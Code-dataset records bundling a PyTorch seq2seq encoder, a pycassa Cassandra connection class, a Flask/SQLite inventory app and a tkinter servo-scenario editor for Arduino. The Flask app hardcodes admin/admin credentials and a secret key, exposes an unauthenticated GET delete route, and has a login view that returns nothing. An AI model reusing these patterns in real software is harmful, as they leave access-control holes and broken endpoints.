"usage_type": "attribute"}, {"api_name": "numpy.linspace", "line_number": 39, "usage_type": "call"}, {"api_name": "random.random", "line_number": 40, "usage_type": "call"}, {"api_name": 
"fct_mf.SolveStaticNonZero", "line_number": 41, "usage_type": "call"}, {"api_name": "fct_mf.overlap", "line_number": 46, "usage_type": "call"}, {"api_name": "fct_mf.variance", "line_number": 47, "usage_type": "call"}, {"api_name": "fct_mf.mean_rate", "line_number": 48, "usage_type": "call"}, {"api_name": "constants.J0", "line_number": 50, "usage_type": "attribute"}, {"api_name": "constants.J0", "line_number": 55, "usage_type": "attribute"}, {"api_name": "numpy.linspace", "line_number": 55, "usage_type": "call"}, {"api_name": "random.random", "line_number": 56, "usage_type": "call"}, {"api_name": "fct_mf.SolveStaticZero", "line_number": 57, "usage_type": "call"}, {"api_name": "fct_mf.overlap", "line_number": 62, "usage_type": "call"}, {"api_name": "fct_mf.variance", "line_number": 63, "usage_type": "call"}, {"api_name": "fct_mf.mean_rate", "line_number": 64, "usage_type": "call"}, {"api_name": "constants.J0", "line_number": 66, "usage_type": "attribute"}, {"api_name": "fct_facilities.SetPlotParams", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 81, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 82, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 91, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 91, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 93, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 95, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 97, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 97, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 101, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 101, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 103, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 103, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 104, "usage_type": "call"}, {"api_name": 
"matplotlib.pyplot", "line_number": 104, "usage_type": "name"}]}
+{"seq_id": "43419146", "text": "import torch\nimport torch.nn as nn\n\n\nclass Encoder(nn.Module):\n def __init__(self, input_dim, embed_dim, enc_hidden_dim,\n dec_hidden_dim, dropout_ratio):\n super().__init__()\n\n # 임베딩(embedding)은 원-핫 인코딩(one-hot encoding)을 특정 차원의 임베딩으로 매핑하는 레이어\n self.embedding = nn.Embedding(input_dim, embed_dim)\n\n # 양방향(bidirectional) GRU 레이어\n self.rnn = nn.GRU(embed_dim, enc_hidden_dim, bidirectional=True)\n\n # FC 레이어\n self.fc = nn.Linear(enc_hidden_dim * 2, dec_hidden_dim)\n\n # 드롭아웃(dropout)\n self.dropout = nn.Dropout(dropout_ratio)\n\n def forward(self, src):\n # src: [단어 개수, 배치 크기]: 각 단어의 인덱스(index) 정보\n\n # embedded: [단어 개수, 배치 크기, 임베딩 차원]\n embedded = self.dropout(self.embedding(src))\n\n outputs, hidden = self.rnn(embedded)\n # outputs: [단어 개수, 배치 크기, 인코더 히든 차원 * 방향의 수]: 전체 단어의 출력 정보\n # hidden: [레이어 개수 * 방향의 수, 배치 크기, 인코더 히든 차원]: 현재까지의 모든 단어의 정보\n\n # hidden은 Bidirectional 이기 때문에\n # [forward_1, backward_1, forward_2, backward_2, ...] 형태로 구성\n # hidden[-2, :, :]은 forwards의 마지막 값\n # hidden[-1, :, :]은 backwards의 마지막 값\n # 디코더(decoder)의 첫 번째 hidden (context) vector는 인코더의 마지막 hidden을 이용\n hidden = torch.tanh(self.fc(torch.cat((hidden[-2, :, :],\n hidden[-1, :, :]), dim=1)))\n\n # outputs은 Attention 목적으로 hidden은 context vector 목적으로 사용\n return outputs, hidden\n", "sub_path": "seq2seq_attention/encoder.py", "file_name": "encoder.py", "file_ext": "py", "file_size_in_byte": 1838, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "torch.nn.Module", "line_number": 5, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 5, "usage_type": "name"}, {"api_name": "torch.nn.Embedding", "line_number": 11, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 11, "usage_type": "name"}, {"api_name": "torch.nn.GRU", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 14, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 20, "usage_type": "name"}, {"api_name": "torch.tanh", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 37, "usage_type": "call"}]}
+{"seq_id": "427660834", "text": "from thrift.transport import TTransport\nfrom thrift.transport import TSocket\nfrom thrift.protocol import TBinaryProtocol\n\nfrom pycassa.cassandra.c10 import Cassandra\nfrom pycassa.cassandra.constants import (CASSANDRA_07, CASSANDRA_08, CASSANDRA_10)\nfrom pycassa.cassandra.ttypes import AuthenticationRequest\nfrom pycassa.util import compatible\n\nDEFAULT_SERVER = 'localhost:9160'\nDEFAULT_PORT = 9160\n\nLOWEST_COMPATIBLE_VERSION = 17\n\nclass ApiMismatch(Exception): pass\n\nclass Connection(Cassandra.Client):\n \"\"\"Encapsulation of a client session.\"\"\"\n\n def __init__(self, keyspace, server, framed_transport=True, timeout=None,\n credentials=None, api_version=None):\n self.keyspace = None\n self.server = server\n server = server.split(':')\n if len(server) <= 1:\n port = 9160\n else:\n port = server[1]\n host = server[0]\n socket = TSocket.TSocket(host, int(port))\n if timeout is not None:\n socket.setTimeout(timeout*1000.0)\n if framed_transport:\n self.transport = TTransport.TFramedTransport(socket)\n else:\n self.transport = TTransport.TBufferedTransport(socket)\n protocol = TBinaryProtocol.TBinaryProtocolAccelerated(self.transport)\n Cassandra.Client.__init__(self, protocol)\n self.transport.open()\n\n if api_version is None:\n server_api_version = self.describe_version()\n if compatible(CASSANDRA_10, server_api_version):\n self.version = CASSANDRA_10\n if compatible(CASSANDRA_08, server_api_version):\n self.version = CASSANDRA_08\n elif compatible(CASSANDRA_07, server_api_version):\n self.version = CASSANDRA_07\n else:\n raise ApiMismatch(\"Thrift API version incompatibility: \" \\\n \"server version %s is not Cassandra 0.7, 0.8, or 1.0\" %\n (server_api_version))\n else:\n self.version = api_version\n\n self.set_keyspace(keyspace)\n\n if credentials is not None:\n request = AuthenticationRequest(credentials=credentials)\n self.login(request)\n\n def set_keyspace(self, keyspace):\n if keyspace != self.keyspace:\n Cassandra.Client.set_keyspace(self, keyspace)\n self.keyspace = keyspace\n\n def close(self):\n self.transport.close()\n", "sub_path": "pycassa/connection.py", "file_name": "connection.py", "file_ext": "py", "file_size_in_byte": 2456, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "pycassa.cassandra.c10.Cassandra.Client", "line_number": 17, "usage_type": "attribute"}, {"api_name": "pycassa.cassandra.c10.Cassandra", "line_number": 17, "usage_type": "name"}, {"api_name": "thrift.transport.TSocket.TSocket", "line_number": 30, "usage_type": "call"}, {"api_name": "thrift.transport.TSocket", "line_number": 30, "usage_type": "name"}, {"api_name": "thrift.transport.TTransport.TFramedTransport", "line_number": 34, "usage_type": "call"}, {"api_name": "thrift.transport.TTransport", "line_number": 34, "usage_type": "name"}, {"api_name": "thrift.transport.TTransport.TBufferedTransport", "line_number": 36, "usage_type": "call"}, {"api_name": "thrift.transport.TTransport", "line_number": 36, "usage_type": "name"}, {"api_name": "thrift.protocol.TBinaryProtocol.TBinaryProtocolAccelerated", "line_number": 37, "usage_type": "call"}, {"api_name": "thrift.protocol.TBinaryProtocol", "line_number": 37, "usage_type": "name"}, {"api_name": "pycassa.cassandra.c10.Cassandra.Client.__init__", "line_number": 38, "usage_type": "call"}, {"api_name": "pycassa.cassandra.c10.Cassandra.Client", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pycassa.cassandra.c10.Cassandra", 
"line_number": 38, "usage_type": "name"}, {"api_name": "pycassa.util.compatible", "line_number": 43, "usage_type": "call"}, {"api_name": "pycassa.cassandra.constants.CASSANDRA_10", "line_number": 43, "usage_type": "argument"}, {"api_name": "pycassa.cassandra.constants.CASSANDRA_10", "line_number": 44, "usage_type": "name"}, {"api_name": "pycassa.util.compatible", "line_number": 45, "usage_type": "call"}, {"api_name": "pycassa.cassandra.constants.CASSANDRA_08", "line_number": 45, "usage_type": "argument"}, {"api_name": "pycassa.cassandra.constants.CASSANDRA_08", "line_number": 46, "usage_type": "name"}, {"api_name": "pycassa.util.compatible", "line_number": 47, "usage_type": "call"}, {"api_name": "pycassa.cassandra.constants.CASSANDRA_07", "line_number": 47, "usage_type": "argument"}, {"api_name": "pycassa.cassandra.constants.CASSANDRA_07", "line_number": 48, "usage_type": "name"}, {"api_name": "pycassa.cassandra.ttypes.AuthenticationRequest", "line_number": 59, "usage_type": "call"}, {"api_name": "pycassa.cassandra.c10.Cassandra.Client.set_keyspace", "line_number": 64, "usage_type": "call"}, {"api_name": "pycassa.cassandra.c10.Cassandra.Client", "line_number": 64, "usage_type": "attribute"}, {"api_name": "pycassa.cassandra.c10.Cassandra", "line_number": 64, "usage_type": "name"}]}
+{"seq_id": "78552534", "text": "# imports\nimport os\nimport sqlite3\nimport json\n\n\nfrom flask import Flask, request, session, g, redirect, url_for, \\\n abort, flash, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\n\n\n# get the folder where this file runs\nbasedir = os.path.abspath(os.path.dirname(__file__))\n\n# configuration\nDATABASE = 'esxi.db'\nDEBUG = True\nSECRET_KEY = 'my_precious'\nUSERNAME = 'admin'\nPASSWORD = 'admin'\n\n# define the full path for the database\nDATABASE_PATH = os.path.join(basedir, DATABASE)\n\n# database config\nSQLALCHEMY_DATABASE_URI = 'sqlite:///' + DATABASE_PATH\nSQLALCHEMY_TRACK_MODIFICATIONS = False\n\n# create app\napp = Flask(__name__)\napp.config.from_object(__name__)\ndb = SQLAlchemy(app)\n\nimport models\n\n\n@app.route('/add/host', methods=['POST'])\ndef add_host():\n \"\"\"Adds new host to the database.\"\"\"\n if not session.get('logged_in'):\n abort(401)\n new_entry = models.Hosts(request.form['host_ip'], request.form['alarming'], request.form['remediation'])\n db.session.add(new_entry)\n db.session.commit()\n flash('New entry was successfully posted')\n return redirect(url_for('index'))\n\n@app.route('/add/process', methods=['POST'])\ndef add_process():\n \"\"\"Adds new process to the database.\"\"\"\n if not session.get('logged_in'):\n abort(401)\n new_entry = models.Process(request.form['cli'], request.form['inbound'], request.form['outbound'], request.form['counter'])\n db.session.add(new_entry)\n db.session.commit()\n flash('New entry was successfully posted')\n return redirect(url_for('index'))\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n \"\"\"User login/authentication/session management.\"\"\"\n error = None\n if request.method == 'POST':\n if request.form['username'] != app.config['USERNAME']:\n error = 'Invalid username'\n elif request.form['password'] != app.config['PASSWORD']:\n error = 'Invalid password'\n else:\n session['logged_in'] = True\n\n\n@app.route('/logout')\ndef logout():\n \"\"\"User logout/authentication/session management.\"\"\"\n session.pop('logged_in', None)\n flash('You were logged out')\n return redirect(url_for('login'))\n\n\n@app.route('/delete/', methods=['GET'])\ndef delete_entry(post_id):\n \"\"\"Deletes post from database.\"\"\"\n result = {'status': 0, 'message': 'Error'}\n try:\n new_id = post_id\n db.session.query(models.Hosts).filter_by(post_id=new_id).delete()\n db.session.commit()\n result = {'status': 1, 'message': \"Post Deleted\"}\n flash('The entry was deleted.')\n except Exception as e:\n result = {'status': 0, 'message': repr(e)}\n return jsonify(result)\n\n\n@app.route('/search/', methods=['GET'])\ndef search():\n query = request.args.get(\"query\")\n entries = db.session.query(models.Hosts)\n if query:\n return render_template('search.html', entries=entries, query=query)\n return render_template('search.html')\n\n@app.route('/get/inventory', methods=['GET'])\ndef get_inventory():\n table_name = 'hosts'\n db_file = 'esxi.db'\n\n conn = sqlite3.connect(db_file)\n conn.row_factory = sqlite3.Row # This enables column access by name: row['column_name'] \n db = conn.cursor()\n\n rows = db.execute(\"SELECT * from %s\" % table_name).fetchall()\n\n conn.commit()\n conn.close()\n\n return json.dumps( [dict(x) for x in rows], indent=4 ) #CREATE JSON\n\n@app.route('/get/process', methods=['GET'])\ndef get_process():\n table_name = 'process'\n db_file = 'esxi.db'\n\n conn = sqlite3.connect(db_file)\n conn.row_factory = sqlite3.Row # This enables column access by name: 
row['column_name'] \n db = conn.cursor()\n\n rows = db.execute(\"SELECT * from %s\" % table_name).fetchall()\n\n conn.commit()\n conn.close()\n\n return json.dumps( [dict(x) for x in rows], indent=4 ) #CREATE JSON\n\n\ndef create_db():\n from models import Hosts, Process\n # create the database and the db table\n db.create_all()\n\n # commit the changes\n db.session.commit()\n\nif __name__ == '__main__':\n create_db()\n app.run()\n", "sub_path": "flaskr-tdd/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 4058, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.path.abspath", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "flask.Flask", "line_number": 30, "usage_type": "call"}, {"api_name": "flask_sqlalchemy.SQLAlchemy", "line_number": 32, "usage_type": "call"}, {"api_name": "flask.session.get", "line_number": 40, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 40, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 41, "usage_type": "call"}, {"api_name": "models.Hosts", "line_number": 42, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 42, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 42, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 45, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 46, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 46, "usage_type": "call"}, {"api_name": "flask.session.get", "line_number": 51, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 51, "usage_type": "name"}, {"api_name": "flask.abort", "line_number": 52, "usage_type": "call"}, {"api_name": "models.Process", "line_number": 53, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 53, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 53, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 56, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 57, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 57, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 64, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 64, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 65, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 65, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 67, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 67, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 70, "usage_type": "name"}, {"api_name": "flask.session.pop", "line_number": 76, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 76, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 77, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 78, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 78, "usage_type": "call"}, {"api_name": "models.Hosts", "line_number": 87, "usage_type": "attribute"}, {"api_name": "flask.flash", "line_number": 90, "usage_type": "call"}, {"api_name": 
"flask.jsonify", "line_number": 93, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 98, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 98, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 98, "usage_type": "name"}, {"api_name": "models.Hosts", "line_number": 99, "usage_type": "attribute"}, {"api_name": "sqlite3.connect", "line_number": 109, "usage_type": "call"}, {"api_name": "sqlite3.Row", "line_number": 110, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 118, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 125, "usage_type": "call"}, {"api_name": "sqlite3.Row", "line_number": 126, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 134, "usage_type": "call"}]}
+{"seq_id": "638846509", "text": "from tkinter import *\nimport tkinter as tk\nfrom tkinter import ttk\nfrom tkinter.filedialog import askopenfilename\nimport threading\nimport sqlite3\nfrom subprocess import call,PIPE,Popen\nimport shutil\nfrom sketchbooks.SW.run_servo import compiling\nfrom db_input import *\nimport os\n\nclass Demo2:\n def __init__(self, master):\n self.master = master\n self.master.geometry('800x400')\n self.frame = tk.Frame(self.master)\n self.master.title('серво менеджер')\n ##########angles from window######################\n self.left_eye = 0\n self.right_e = 0\n self.right_sholder = 0\n self.right_hand = 0\n self.left_hand = 0\n self.left_leg = 0\n self.right_leg = 0\n self.reserved_1 = 0\n self.reserved_2 = 0\n #################VALUES FOR TIMER##################################\n self.timer = False\n self.default_seconds = 0\n self.timer_seconds = self.default_seconds\n self.sql_time=[]\n self.sql_servo_1 = 0\n self.sql_servo_2 = 0\n self.sql_servo_3 = 0\n self.sql_servo_4 = 0\n self.sql_servo_5 = 0\n self.sql_servo_6 = 0\n self.sql_servo_7 = 0\n self.sql_servo_8 = 0\n self.sql_servo_9 = 0\n self.sql_speed = 0\n self.speed =0\n self.time = 0\n ##################\n self.current_name_db = ''\n self.path = 'position.dms'\n\n self.lab_ser_1 = ttk.Label(self.master, text='глаз левый ').grid(row=0, column=1)\n self.left_eye = IntVar()\n self.angle_box1 = ttk.Entry(self.master, textvariable=self.left_eye, width=3)\n self.angle_box1.grid(row=1, column=1)\n\n self.lab_ser_2 = ttk.Label(self.master, text='глаз правый').grid(row=4, column=1)\n self.right_e = IntVar()\n self.angle_box2 = ttk.Entry(self.master, textvariable=self.right_e, width=3)\n self.angle_box2.grid(row=5, column=1)\n\n self.lab_ser_3 = ttk.Label(self.master, text='плечо правое').grid(row=8, column=1)\n self.right_sholder = IntVar()\n self.angle_box3 = ttk.Entry(self.master, textvariable=self.right_sholder, width=3)\n self.angle_box3.grid(row=9, column=1)\n\n self.lab_ser_4 = ttk.Label(self.master, text='рука правая').grid(row=0, column=2)\n self.right_hand = IntVar()\n self.angle_box4 = ttk.Entry(self.master, textvariable=self.right_hand, width=3)\n self.angle_box4.grid(row=1, column=2)\n\n self.lab_ser_5 = ttk.Label(self.master, text='рука левая').grid(row=4, column=2)\n self.left_hand = IntVar()\n self.angle_box5 = ttk.Entry(self.master, textvariable=self.left_hand, width=3)\n self.angle_box5.grid(row=5, column=2)\n\n self.lab_ser_6 = ttk.Label(self.master, text='нога левая').grid(row=8, column=2)\n self.left_leg = IntVar()\n self.angle_box6 = ttk.Entry(self.master, textvariable=self.left_leg, width=3)\n self.angle_box6.grid(row=9, column=2)\n\n self.lab_ser_7 = ttk.Label(self.master, text='нога правая ').grid(row=0, column=3)\n self.right_leg = IntVar()\n self.angle_box7 = ttk.Entry(self.master, textvariable=self.right_leg, width=3)\n self.angle_box7.grid(row=1, column=3)\n\n self.lab_ser_8 = ttk.Label(self.master, text='reserved_1 ').grid(row=4, column=3)\n self.reserved_1 = IntVar()\n self.angle_box7 = ttk.Entry(self.master, textvariable=self.reserved_1, width=3)\n self.angle_box7.grid(row=5, column=3)\n\n self.lab_ser_9 = ttk.Label(self.master, text='reserved_2 ').grid(row=8, column=3)\n self.reserved_2 = IntVar()\n self.angle_box7 = ttk.Entry(self.master, textvariable = self.reserved_2, width=3)\n self.angle_box7.grid(row=9, column=3)\n\n self.play_butt = ttk.Button(self.master, text='проиграть',command=self.some_play).grid(row=12, column=2)\n\n self.button = ttk.Button(self.master, text='записать 
позиции',command =self.write_position)\n        self.button.grid(row=13, column=2)\n\n\n\n        self.write = ttk.Button(self.master, text='удалить все значения',command = self.create_new) .grid(row=15, column=2,)\n        self.time_label = ttk.Label(self.master, text=\"время\").grid(row=18, column=2, sticky='ws', padx=0)\n        self.time_scale = ttk.Scale(self.master, orient='horizontal', length=400, from_=0, to=180,command =self.printime )\n        self.time_scale.grid(row=19, column=2,pady=10)\n        #digit near \"время\"\n        self.time_digit = ttk.Label(self.master)\n        self.time_digit.grid(row=18, column=2, sticky='w', padx=50)#padx controls the horizontal shift; larger values move the widget further right\n\n\n\n        self.speed_label = ttk.Label(self.master,text =\"cкорость\").grid(row=16,column =2,sticky = 'ws',padx=0)\n        # digit near \"скорость\"\n        self.speed_digit = ttk.Label(self.master)\n        self.speed_digit.grid(row=16,column =2,sticky = 'w',padx=65)\n\n        self.speed_slider = ttk.Scale(self.master,orient = \"horizontal\", length =100,from_ = 0 ,to =100,command =self.prinw)\n        self.speed_slider.grid(row=17,column =2,sticky = 'ws',padx=0)\n\n        self.label_time = ttk.Label(self.master)\n        self.label_time.grid(row=15, column=2)\n        # self.background_image = tk.PhotoImage(...)\n        # self.background_label = tk.Label(self.master, image=background_image)\n        # self.background_label.place(x=0, y=0, relwidth=1, relheight=1)\n        self.new = ttk.Button(self.master,text=\"новый сценарий\",command = self.new_data).grid(row =1,column =8)\n        self.window_curr = ttk.Button(self.master,text=\"выбрать сценарий\",command = self.choose_db).grid(row =3,column =8,sticky = 'e')\n        self.window_db = Listbox(self.master,width=25,height=3)\n        self.window_db.grid(row=15,column=8,sticky= 'w')\n        self.request_butt = ttk.Button(self.master,text='выбрать текущий',command = self.current_db).grid(row=16,column=8,sticky= 'w')\n\n\n\n    def prinw(self,val):\n        # define for speed\n        self.speed=round(float(val))\n        # change label to show the speed\n        self.speed_digit.configure(text=round(self.speed))\n    def printime(self,val):\n        # define for time\n        self.time=round(float(val))\n        m = self.time // 60\n        s = self.time - m * 60\n        self.time_digit.configure(text='%02d:%02d' % (m, s))\n\n\n\n    def choose_db(self):\n        fname = askopenfilename(filetypes=((\"scenario\", \"*.db\"),\n                                           (\"All files\", \"*.*\") ))\n        print(fname[-6:-1])\n        self.current_name_db = fname\n        self.window_db.insert(END,fname[-25:-1] + '\\n')\n    def current_db(self):\n        self.path = self.current_name_db\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n    def write_position(self):\n        # write the current positions to sql\n\n        conn = sqlite3.connect(self.path)\n        cursor = conn.cursor()\n        cursor.executescript(\"\"\"\n        insert into `time` values (%d)\n        \"\"\" % (round(self.time_scale.get()*1000)))#time\n        cursor.executescript(\"\"\"\n        insert into `speed` values (%d)\n        \"\"\" % (round(self.speed_slider.get()))) # speed\n        cursor.executescript(\"\"\"\n        insert into `servo_2` values (%d)\n        \"\"\" % (self.left_eye.get()))#servo_1\n        cursor.executescript(\"\"\"\n        insert into `servo_1` values (%d)\n        \"\"\" % (self.right_e.get()))#servo_2\n        cursor.executescript(\"\"\"\n        insert into `servo_3` values (%d)\n        \"\"\" % (self.right_sholder.get()))#servo_3\n        cursor.executescript(\"\"\"\n        insert into `servo_4` values (%d)\n        \"\"\" % (self.left_hand.get()))#servo_4\n        cursor.executescript(\"\"\"\n        insert into `servo_5` values (%d)\n        \"\"\" % (self.right_hand.get()))#servo_5\n        cursor.executescript(\"\"\"\n        insert into `servo_6` values (%d)\n        \"\"\" % (self.right_leg.get()))# servo_6\n        cursor.executescript(\"\"\"\n        insert into `servo_7` 
values (%d)\n        \"\"\" % (self.left_leg.get()))# servo_7\n        cursor.executescript(\"\"\"\n        insert into `servo_8` values (%d)\n        \"\"\" % (self.reserved_1.get()))#servo_8\n        cursor.executescript(\"\"\"\n        insert into `servo_9` values (%d)\n        \"\"\" % (self.reserved_2.get()))#servo_9\n        self.write_to_h()\n\n\n\n\n    def clear_strings(self):\n        # clean rubbish characters out of the template\n        f = open('template.h','r')\n        o = open('VAL.h', 'w')\n        while 1:\n            line = f.readline()\n            if not line: break\n            line = line.replace('(', '')\n            line = line.replace(')', '')\n            line = line.replace(',,', ',')\n            line = line.replace(\"''\", '0')\n            line = line.replace('[][]','[]')\n            line = line.replace('{[]}','{}')\n            line = line.replace('{[','{')\n            line = line.replace(']}','}')\n            line = line.replace(')]};','')\n            o.write(line)\n        o.close()\n        call('rm template.h',shell =True)\n        # move VAL.h with values from sql to arduino library:******************\n        shutil.move(\"/home/qbc/PycharmProjects/ard/VAL.h\", \"/usr/share/arduino/hardware/arduino/cores/arduino/VAL.h\")\n        # call('rm VAL.h',shell =True)\n\n\n\n\n    def write_to_h(self):\n        # take everything from the database\n        conn = sqlite3.connect(self.path)# available databases will be used here\n        cursor = conn.cursor()\n        #time\n        cursor.execute(\"SELECT * FROM `time` order by `time_pos` \")\n        self.sql_time = cursor.fetchall()\n        # servo_1\n        cursor.execute(\"SELECT * FROM `servo_1` \")\n        self.sql_servo_1 =cursor.fetchall()\n        # servo_2\n        cursor.execute(\"SELECT * FROM `servo_2` \")\n        self.sql_servo_2 = cursor.fetchall()\n        # servo_3\n        cursor.execute(\"SELECT * FROM `servo_3` \")\n        self.sql_servo_3 = cursor.fetchall()\n        # servo_4\n        cursor.execute(\"SELECT * FROM `servo_4` \")\n        self.sql_servo_4 = cursor.fetchall()\n        # servo_5\n        cursor.execute(\"SELECT * FROM `servo_5` \")\n        self.sql_servo_5= cursor.fetchall()\n        # servo_6\n        cursor.execute(\"SELECT * FROM `servo_6` \")\n        self.sql_servo_6 = cursor.fetchall()\n        # servo_7\n        cursor.execute(\"SELECT * FROM `servo_7` \")\n        self.sql_servo_7 = cursor.fetchall()\n        # servo_8\n        cursor.execute(\"SELECT * FROM `servo_8` \")\n        self.sql_servo_8 = cursor.fetchall()\n        # servo_9\n        cursor.execute(\"SELECT * FROM `servo_9` \")\n        self.sql_servo_9 = cursor.fetchall()\n        cursor.execute(\"SELECT * FROM `speed` order by `speed_pos` \")\n        self.sql_speed = cursor.fetchall()\n        # servo_1\n\n        with open('template.h','w') as file:\n            file.writelines('int time_play=1;\\n')\n            file.writelines('int speed_row[] = {')\n            file.writelines(str(self.sql_speed))\n            file.writelines('};\\n')\n            file.writelines('int LEyeArray[][] = {')\n            file.writelines(str(self.sql_servo_1))\n            file.writelines('};\\n')\n            file.writelines('int REyeArray[] = {')\n            file.writelines(str(self.sql_servo_2))\n            file.writelines('};\\n')\n            file.writelines('int LArmArray[] = {')\n            file.writelines(str(self.sql_servo_3))\n            file.writelines('};\\n')\n            file.writelines('int RArmArray[] = {')\n            file.writelines(str(self.sql_servo_4))\n            file.writelines('};\\n')\n            file.writelines('int LhandArray[] = {')\n            file.writelines(str(self.sql_servo_5))\n            file.writelines('};\\n')\n            file.writelines('int RhandArray[] = {')\n            file.writelines(str(self.sql_servo_6))\n            file.writelines('};\\n')\n            file.writelines('int LLegArray[] = {')\n            file.writelines(str(self.sql_servo_7))\n            file.writelines('};\\n')\n            file.writelines('int RLegArray[] = {')\n            file.writelines(str(self.sql_servo_8))\n            file.writelines('};\\n')\n            file.writelines('int AssArray[] = {')\n            file.writelines(str(self.sql_servo_9))\n            file.writelines('};\\n')\n            file.writelines('unsigned long KeyArray[] = {')\n            
file.writelines(str(self.sql_time))\n            file.writelines('};\\n')\n        self.clear_strings()\n\n    def create_new(self):\n        conn = sqlite3.connect('position.dms')\n        cursor = conn.cursor()\n        cursor.execute(\n            'CREATE TABLE servo_1 (servo1_pos integer );')\n        cursor.execute(\n            'CREATE TABLE servo_2 (servo2_pos integer );')\n        cursor.execute(\n            'CREATE TABLE servo_3 (servo3_pos integer );')\n        cursor.execute(\n            'CREATE TABLE servo_4 (servo4_pos integer );')\n        cursor.execute(\n            'CREATE TABLE servo_5 (servo5_pos integer );')\n        cursor.execute(\n            'CREATE TABLE servo_6 (servo6_pos integer );')\n        cursor.execute(\n            'CREATE TABLE servo_7 (servo7_pos integer );')\n        cursor.execute(\n            'CREATE TABLE servo_8 (servo8_pos integer );')\n        cursor.execute(\n            'CREATE TABLE servo_9 (servo9_pos integer );')\n        cursor.execute(\n            'CREATE TABLE speed (speed_pos integer );')\n        cursor.execute(\n            'CREATE TABLE time (time_pos integer );')\n        # self.deleteall()\n    def 